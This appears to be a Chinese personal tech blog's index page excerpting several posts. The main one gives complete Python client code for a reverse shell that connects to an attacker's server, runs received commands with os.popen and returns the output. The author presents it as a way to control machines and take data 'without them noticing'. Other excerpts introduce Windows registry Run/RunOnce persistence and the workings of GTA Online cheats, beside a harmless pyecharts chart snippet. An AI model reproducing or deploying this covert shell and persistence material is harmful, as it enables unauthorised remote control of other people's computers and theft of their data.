编辑
2024-03-16
杂七杂八
00

Byte的技术分享站

  • 这里会时不时分享一些关于
  • 渗透测试
  • 开发/测试
  • 以及其他的一些
编辑
2024-03-16
关于渗透的那些事
00

基于python的反向连接

  • 基于python的反向shell 本人纯纯小白,为了数据写了个这个。
  • 众所周知,我们想要控制一台没有公网的设备只能通过某些软件和frp等服务把它串出去,所以写了个服务,用于在不知不觉中远程控制和传输数据。
  • 如有能力可以在github(直接点击)上帮我点个star,谢谢,祝您数据获取愉快。

如下是客户端代码(需要在受控机上运行)

python
import os import socket import time HOST = '你自己服务器的ip或者域名' PORT = '这里改成你传输的端口,要和服务端端口一致' while True: # 创建 socket 对象 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try: s.connect((HOST, PORT)) connected = True except ConnectionRefusedError: connected = False print("连接拒绝,无法连接到服务器。") while connected: try: # 接收数据 data = s.recv(1024).decode() print("接收到的数据:", data) if not data: # 数据为空,表示连接断开 connected = False break result = os.popen(data).read() print("执行结果:", result) message = result if message: # 发送字符串给服务器 s.sendall(message.encode()) else: ret = '返回值为空' s.sendall(ret.encode()) except ConnectionResetError: print("连接重置,连接已断开。") connected = False break if not connected: print("连接断开,重新尝试连接...") time.sleep(5) # 延迟5秒后进行下一次连接尝试 print("客户端运行结束。")
编辑
2024-04-14
关于渗透的那些事
00

在Windows上的注册表自启动

在内网或者渗透中,我们时常需要自启动或者基于主机的持久化有基于注册表的自启动或者基于文件夹的自启动shell:startup

在通过注册表自启动,主要是有 RunRunOnce ,其中RunOnce和Run区别在于RunOnce的键值只作用一次,执行完毕后会自动删除。

  • 操作方式如下:
编辑
2024-04-09
关于开发的那些事
00

pyecharts数据可视化

如果需要jupyter版的请访问这个下载

生成柱状图

python
#生成柱状图 from pyecharts.charts import Bar from pyecharts.faker import Faker #假数据 bar = (Bar() .add_xaxis(Faker.choose()) #假数据 .add_yaxis('test',Faker.values()) #假数据 ) bar.render() #渲染


编辑
2024-03-16
摆烂人
00

论GTA线上科技的使用原理及GTA线上模式P2P运行原理

在正确使用科技之前首先要了解一下游戏科技的原理以及GTA线上模式p2p网络运行原理

关于p2p我建议用心去看一下,了解之后对于你之后上手2t或者玩别的gta科技有很大的帮助如果看不懂可以看我下面说的话自己脑海想象一下。